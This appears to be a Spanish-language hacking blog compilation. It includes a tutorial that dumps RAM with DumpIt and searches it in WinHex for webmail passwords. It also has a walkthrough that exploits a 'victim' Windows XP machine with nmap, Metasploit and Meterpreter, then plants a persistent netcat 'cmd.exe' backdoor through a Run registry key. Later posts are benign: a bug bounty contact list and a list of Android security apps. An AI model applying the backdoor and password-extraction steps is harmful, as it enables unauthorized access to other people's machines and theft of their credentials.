VOLCADO DE MEMORIA RAM PARA EXTRACCION DE CONTRASEÑAS DE HOTMAIL, YAHOO Y GMAIL

lo primero que debemos hacer es descargar las aplicaciones para dicho fin, para descargar DUMPIT, lo haremos desde aqui y para descargar el WinHex lo haremos desde aqui.

despues de haberlos decargado, los copiaremos en el escritorio y los extraeremos, ya que vienen compilados en un .rar.

despues de haberlos extraido entraremos en la carpeta de DUMPIT, ahi encontraremos en archivo .exe

este archivo lo copiaremos en el escritorio y posteriormente lo ejecutaremos.
cuando lo ejecutemos nos mostrara un cuadro como este.

aqui daremos "si" que lo denotaremos con la letra"y", luego daremos enter.

cuando le demos enter nos aparecera algo asi.

como podemos ver, esta consola esta procesando la información que encontró en la memoria, para luego entregárnosla en un archivo. raw.

en el escritorio se creara un archivo como este, con el nombre de su equipo.

este archivo será el que analizaremos con el WinHex.

para examinar el archivo con el WinHex, vamos a la carpeta WinHex, y ejecutamos el aplicativo.

cuando lo ejecutamos nos aparecerá la interfaz de WinHex.

esta es la parte superior de la interfaz del WinHex, como podemos ver hay menú completo con múltiples opciones, para este caso usaremos solo 3.

la primera opción a usar es la de la pestaña FILE, daremos click en ella y luego en OPEN, cuando le demos click en OPEN nos abrirá un subcuadro en el que buscaremos la ruta en la cual quedo el archivo generado por el DUMPIT, cuando tengamos ubicado el archivo, lo seleccionaremos y le daremos click en abrir, cuando el archivo se encuentre cargado en el DUMPIT, vamos a la pestaña VIEW, ahi seleccionaremos la casilla de TEXT DISPLAY ONLY, luego daremos click en SEARCH y nos paracera algo asi.

en la parte de arriba colocaremos la palabra que deseamos buscar, en este caso buscaremos la palabra Passwd, dejamos las casillas por default y damos click en OK, después de darle click en OK, WinHex comenzara a cargar una barra, lo cual nos indica que esta realizando la búsqueda de la palabra en el archivo.

cuando complete la búsqueda, empezaremos a ver cada uno de los resultados.

en este caso me loguee en GMAIL.

después de completar la búsqueda, nos mostrara el numero de aciertos.

los aciertos nos aparecerán en una lista así.

podemos empezar a ver uno por uno, y cuando nos aparezca algo como el cuadro que sigue, ahí estará la contraseña.

PROTEGE TUS CONTRASEÑAS

si quieres saber mas sobre como proteger tus contraseñas visita el siguiente link haciendo click AQUI

Obtener Contraseñas de Hotmail, Yahoo, Gmail de la Memoria

EL SIGUIENTE LINK , TOMADO DE BLACKPLOIT.COM SOLO CON FINES EDUCATIVOS.
http://www.blackploit.com/2012/12/obtener-contrasenas-de-hotmail-yahoo.html

PARA VER EL VIDEO DAR CLICK AQUI

BACKDORIZANDO XP DESDE BACKTRACK CON MSF

lo primero que necesitamos saber es la IP de la victima, después de saber la IP, nos vamos a BACKTRACK y haremos un escaneo con nmap, haremos un escaneo silencioso que nos diga cual sistema operativo corre la victima, entonces, el escaneo lo haremos así:

nmap -sS -O (IP de la victima)

como podemos ver en la imagen, la IP de la victima (xp) es 192.168.1.5

el paso a seguir es copiar en el escritorio de BACKTRACK, el archivo que nos creara la puerta trasera (BACKDOOR), el archivo se llama nc.exe (nc es la abreviatura de netcat). 

ahora si, procederemos con nuesttro escaneo.

el escaneo informa, sobre los puertos abiertos en la victima y el sistema operativo que esta corriendo.

ahora ejecutaremos METASPLOIT en una terminal, digitando el comando #msfconsole, para poder cargar el exploit que usaremos.

teniendo ya seleccionado nuestro exploit, pasaremos a configurar un PAYLOAD con su debida configuración:

1. LHOST (ip local)

2. RHOST (ip remota)

3. exploit (lanzarlo)

después de haber lanzado el exploit, vemos que METERPRETER nos muestra una sesión abierta en la victima.

ahora, mediante METERPRETER subiremos el archivo nc.exe, que tenemos copiado en el escritorio de BACKTRACK a la carpeta system32 de la victima.

ahora iremos a los registros de WINDOWS para ver que esta ejecutando actualmente.

esto lo haremos digitando la siguiente linea de comandos.

>reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN 

ahora vamos a alterar los valores de los registros de WINDOWS en H_KEY_LOCAL_MACHINE (HKLM), y esto lo haremos con el siguiente comando.

>reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c: \\WINDOWS\\system32\\nc.exe "-L -d -p (puerto) -e cmd.exe".

ahora correremos nuevamente el comando:

 reg enumkey -kkHKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN

para verificar que el BACKDOOR si quedo en los registros de HKLM.

efectivamente, el BACKDOOR está en los registros, ahora lo que haremos será reiniciar la maquina de la victima (xp), lo cual haremos con el comando >reboot.

vemos que esta reiniciando la maquina de la victima.

ahora solo queda abrir una terminal en BACKTRACK y digitar el siguiente comando.

#nc (IP de la victima) (puerto)

#nc 192.168.1.5 1111

con esto ya estamos dentro cada vez que la victima inicie sesión!!!!!

Lista de Programas Bug Bounty (Ganando Dinero por reportar Vulnerabilidades)

SOLO CON LA FIRME INTENSIÓN DE DIFUNDIR INFORMACION, HE TOMADO LA INFO DEL BLOG DE http://calebbucker.blogspot.com

Bug Bounty Program es un tema muy conocido que manejan las compañías conocidas como: Google, Facebook, Mozilla, etc, la cual se basa en realizar un pago considerable a los "Hackers" o "Security Research" por encontrar y reportar cualquier tipo de vulnerabilidad en sus servidores web, productos, servicios o algunas aplicaciones asociadas. 

Mayormente este programa los emplean las grandes empresas y sitios webs como también las empresas que desean mejorar su seguridad con el fin de brindar un mejor servicio a sus clientes, para tal caso listare la información respectiva que brindan las empresas con mas influencia en la red para reportar las vulnerabilidades que podamos encontrar al momento que estemos realizando nuestras auditorias.

BUG BOUNTY VULNERABILIDADES EN APLICACIONES WEB:

Mozilla

• security@mozilla.org 
• http://www.mozilla.org/security
• http://www.mozilla.org/projects/security/security-bugs-policy.html
• http://www.mozilla.org/security/announce

Google

• security@google.com 
• https://www.google.com/appserve/security-bugs/new?rl=xkp7zert49a5q6owod28bhr2

Facebook

• http://www.facebook.com/whitehat/bounty

Paypal

• sitesecurity@paypal.com 
• https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=security/reporting_security_issues

Etsy

• http://www.etsy.com

Wordpress

• http://www.whitefirdesign.com/about/wordpress-security-bug-bounty-program.html

Commonsware

• http://commonsware.com/bounty.html

CCBill

• http://www.ccbill.com/developers/security/vulnerability-reward-program.php
• http://www.ccbill.com/developers/security/rewards.php 

Vark

• http://www.vark.com

Windthorstisd

• http://www.windthorstisd.net/BugReport.cfm

BUG BOUNTY VULNERABILIDADES EN PRODUCTOS:

Mozilla

• http://www.mozilla.org/security
• http://www.mozilla.org/security/known-vulnerabilities/firefox.html

Google Chrome

• http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program

Zero Day Initiative

• http://www.zerodayinitiative.com

Barracuda

• bugbounty@barracuda.com
• http://www.barracudalabs.com/bugbounty
• http://www.barracudalabs.com/bugbounty/halloffame.html

Artifex Software

• http://www.ghostscript.com/Bug_bounty_program.html

Hex Rays

• http://www.hex-rays.com/bugbounty.shtml

Ardour

• http://ardour.org/bugbounty

Piwik

• http://piwik.org/security

HALL OF FAME (SALON DE LA FAMA):

Microsoft

• http://technet.microsoft.com/en-us/security/ff852094.aspx
• http://technet.microsoft.com/en-us/security/cc308589
• http://technet.microsoft.com/en-us/security/cc308575
• http://technet.microsoft.com/en-us/security/cc261624
• http://www.microsoft.com/security/msrc/default.aspx

Apple

• product-security@apple.com
• http://support.apple.com/kb/HT1318
• https://ssl.apple.com/support/security/ 

Adobe

• http://www.adobe.com/support/security/bulletins/securityacknowledgments.html
• http://www.adobe.com/support/security/alertus.html

IBM

• http://www-03.ibm.com/security/secure-engineering/report.html

Twitter

• https://twitter.com/about/security
• http://support.twitter.com/groups/33-report-abuse-or-policy-violations/topics/122-reporting-violations/articles/477159-how-to-report-xss-api-and-other-security-vulnerabilities#
• https://support.twitter.com/forms

Dropbox

• security@dropbox.com
• https://www.dropbox.com/security
• https://www.dropbox.com/special_thanks

Cisco

• http://tools.cisco.com/security/center/home.x#~alerts

Moodle

• http://moodle.org/security

Drupal

• http://drupal.org/security-team

Oracle

• http://www.oracle.com/us/support/assurance/reporting/index.html

Symantec

• http://www.symantec.com/security

Ebay

• http://pages.ebay.com/securitycenter/Researchers.html

Twilio

• http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html

37 Signals

• http://37signals.com/security-response

Salesforce

• http://www.salesforce.com/company/privacy/disclosure.jsp

Reddit

• http://code.reddit.com/wiki/help/whitehat

Github

• http://help.github.com/responsible-disclosure/

Ifixit

• http://www.ifixit.com/Info/responsible_disclosure

Constant Contact

• http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp

Zeggio

• http://www.zeggio.com

Simplify

• http://simplify-llc.com/simplify-security.html

Team Unify

• http://www.teamunify.com/__corp__/security.php

Skoodat

• http://www.skoodat.com/Security

Relaso

• http://relaso.com/disclosure

Moduscsr

• http://www.moduscsr.com/security_statement.php

Cloudnetz

• http://cloudnetz.com/Legal/vulnerability-testing-policy.html

Emptrust

• http://www.emptrust.com/Security.aspx

Apriva

• http://www.apriva.com/security

Amazon

• http://aws.amazon.com/security/vulnerability-reporting

SqaureUp

• https://squareup.com/security/levels

G-Sec

• http://www.g-sec.lu/responsible.disclosure.policy.html

Xen

• http://www.xen.org/projects/security_vulnerability_process.html

Engine Yard

• http://www.engineyard.com/legal/responsible-disclosure-policy

Lastpass

• https://lastpass.com/support_security.php

RedHat

• https://access.redhat.com/knowledge/articles/66234 

Acquia

• https://www.acquia.com/how-report-security-issue

Mahara

• security@mahara.org 
• https://wiki.mahara.org/index.php/Security 

Zynga

• security@zynga.com 
• http://company.zynga.com/security/whitehats 

Risk.io

• https://www.risk.io/security

Opera 

• http://www.opera.com/security/policy

Owncloud

• http://owncloud.org/security/policy
• http://owncloud.org/security/hall-of-fame

Scorpion Soft

• security@scorpionsoft.com
• http://www.scorpionsoft.com/company/disclosurepolicy

Norada 

• http://norada.com/norada/crm/security_response

Cpaperless 

• http://www.cpaperless.com/securitystatement.aspx

Wizehive 

• http://www.wizehive.com/security

Tuenti

• http://corporate.tuenti.com/en/dev/hall-of-fame

Nokia Siemens

• http://www.nokiasiemensnetworks.com/about-us/responsible-disclosure

Sound Cloud

• http://help.soundcloud.com/customer/portal/articles/439715-responsible-disclosure

Puppetlabs

• http://puppetlabs.com/security

Neohapsis

• http://www.neohapsis.com/disclosure.php

HTC

• http://www.htc.com/us/legal/product-security

Estas son las empresas que nos pueden considerar un pago por reportarles los fallos de seguridad que se encuentran en sus sitios webs y productos.

Les mostrare una vulnerabilidad (XSS) que encontre en Google Play la cual fue respectivamente reportada y aceptada.

ENTRADA AL BARCAMP SE MEDELLIN 2012

[PAPER] PENETRATION TESTING EITH BACKTRACK

en el siguiente link encontraran una guía para un TEST DE PENETRACIÓN con BCKTRACK

CLICK AQUI PARA DESCARGAR PDF

TOMADO DE http://www.blackploit.com

APLICACIONES DE SEGURIDAD PARA ANDROID

Hoy en día le estamos dando muchas utilidades a nuestro Smartphone, por lo cual esté administra y almacena casi la misma o más información sensible que nuestros mismos computadores. A esto sumemosle el crecimiento exponencial de Android y todos los nuevos Malwares que se están diseñando para una plataforma que está muy lejos de acabarse. 

Es por ello que se hace imprescindible secularizar nuestro dispositivos y recientemente en blog de kaspersky han publicado lo que según ellos son las 20 mejores aplicaciones de seguridad para Android:

1. mSecure Password Manager: (9,99 US$) utiliza la tecnología de cifrado para proteger todos los datos de tu monedero digital, inclusive los nombres de usuarios, las contraseñas y números de cuenta. Además, realiza una copia de seguridad automática en la tarjeta SD de los datos cifrados y contiene un generador de contraseñas para crear códigos de acceso seguros y complejos.


2. SplashID Safe: (9,99 US$) los piratas informáticos están al acecho de las contraseñas y credenciales de los usuarios para poder acceder a sus cuentas e información. Con esta aplicación para Android, tenemos todos nuestros datos guardados en una caja fuerte: contraseñas, pin, números de las tarjetas de crédito… Puedes, además, usar SplashID Safe para realizar una copia de seguridad de tu información, sincronizando el dispositivo Android con tu equipo PC o Mac.


3. SeekDroid AntiTheft & Security: (2,99 US$) esta app nos ayuda a localizar nuestro dispositivo en caso de pérdida. El rastreo GPS nos permite encontrarlo de forma rápida y ayuda a prevenir que nos rastreen nuestro teléfono.


4. Safe Notes: (FREE!) nuestra información confidencial no se limita a contraseñas o nombres de usuarios. Nuestros dispositivos pueden contener datos realmente importantes en forma de notas, por ejemplo. Con Safe Notes podrás cifrar dicha información, accediendo a ella a través de un pin o pregunta secreta.


5. B-Secure Tracker: (FREE!) en caso de pérdida o robo, podemos usar nuestros dispositivos en contra de los hackers. Esta aplicación nos proporcionar un portal remoto donde localizar nuestro dispositivo en Google Maps. Además, puede hacer fotos y grabar sonidos del ladrón; enviándote dichos archivos a través de correo electrónico.


6. Secure Settings: (FREE!) este plugin de Android nos ofrece una interfaz donde restablecer nuestro código de acceso así como activar o desactivar ADB y GPS.


7. Remote Security: (1,16 US$) con esta aplicación puedes bloquear tu dispositivo de forma remota, activar una alarma de robo de tu teléfono, hacer que éste llame a un número predeterminado o eliminar datos confidenciales de tu dispositivo (como SMS).


8. eWallet: (9,99 US$) proporciona una mayor seguridad para las contraseñas y credenciales de los dispositivos Android. eWallet no sólo protege contraseñas sino cualquier dato confidencial.


9. GadgetTrak Mobile Security: (FREE!) es una app tanto para usuarios como para entidades empresariales, la cual ofrece una protección múltiple para nuestros dispositivos Android. Los ajustes de seguridad y software estarán a salvo y se avisará de cualquier cambio no autorizado en la tarjeta SIM. Asimismo, incluye rastreo GPS, eliminación de datos de forma remota y funcionalidades de cifrado y copia de seguridad.


10. SPB Wallet: (7,00 US$) aplicación de seguridad que almacena y cifra contraseñas y datos de tarjetas de crédito, sincronizándose de forma segura con otros dispositivos y proporcionando protección anti-phishing.


11. Password Box: (2,99 US$) si gestionar tus contraseñas te trae quebraderos de cabeza, esta aplicación puede ayudarte al respecto. Password Box te proporciona un almacenamiento seguro para las credenciales de tu dispositivo, realizando, automáticamente, una copia de seguridad cifrada en una tarjeta SD.


12. Perfect App Protector Pro: (FREE!) si estás preocupado por los datos de acceso que usas en las diferentes aplicaciones –banca online, email, redes sociales- esta aplicación de seguridad te permite seleccionar la app que quieras y protegerla con una contraseña diferente. Igualmente, se puede proteger otros datos como fotos e incluso la cámara del dispositivo.


13. AirCover Security Suite: (FREE!) esta aplicación de seguridad ofrece seis servicios para proteger los datos de tu familia. Se pueden establecer alertas para situaciones de emergencia. Incluye, a su vez, protección frente a pérdida (GPS, bloqueo remoto…) y protección y copia de seguridad en la nube.


14. Pocket: (FREE!) toda la información confidencial –número de cuentas, contraseñas- nunca debería almacenarse en las notas o contactos de tus dispositivo. Esta app proporciona un lugar seguro donde esconder todos esta información de las miradas indiscretas. Se cifra la información y podemos acceder a ella a través de una contraseña maestra. Además, realiza una copia de seguridad automática en Dropbox.


15. DataVault Password Manager: (9,99 US$) muestra carpetas similares a Windows Explorer, lo que nos facilita el manejo de la app. La aplicación crea contraseñas complejas y nos muestra la fortaleza de las mismas. Junto con la funcionalidad de cifrado y copia de seguridad en una tarjeta SD, el usuario también puede establecer un tiempo de espiración y un número de intentos determinado para las contraseñas.


16. BioWallet Signature: (FREE!) utiliza tus contraseñas manuscritas y sólo podrás acceder a los datos guardados firmando sobre la pantalla del dispositivo.


17. BoxCryptor: (FREE!) aplicaciones como Dropbox o Google Drive son realmente populares entre los usuarios. BoxCryptor añade un nivel extra de seguridad, cifrando los archivos guardados en los servicios de la nube.


18. CryptRoll Secure Notepad: (FREE!) CryptRoll no sólo protege las notas de tu dispositivo Android sino que almacena los archivos cifrados en Google Docs. Asimismo, brinda la oportunidad de cifrar los sms y emails.


19. Seal App Locker: (2,59 US$) protege cualquier aplicación ayudándote a crear contraseñas complejas e identificando posibles apps maliciosas.


20. App Protector Pro: (1,50 US$) ¿te preocupa la seguridad de tus mensajes de texto, contactos o fotos? Con esta aplicación, puedes usar una contraseña maestra en cualquier app de mensajería que utilices